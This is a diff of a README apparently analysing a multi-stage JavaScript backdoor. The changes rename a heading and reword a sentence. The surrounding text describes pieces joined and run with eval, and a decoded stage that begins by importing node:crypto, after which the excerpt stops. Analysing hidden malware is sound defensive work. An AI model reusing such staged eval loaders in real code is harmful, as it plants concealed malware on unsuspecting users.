yo-yo-yo-jbo/github_ai_backdoor/README.md

 The entire thing is joined and evaluated using `eval`.
 Decoding that reveals the next part.

-## First stage
+## Stage 1
-Second stage looks like this:
+This stage looks like this:
 ```js
 (async()=>{try{
 const _c=await import("node:crypto");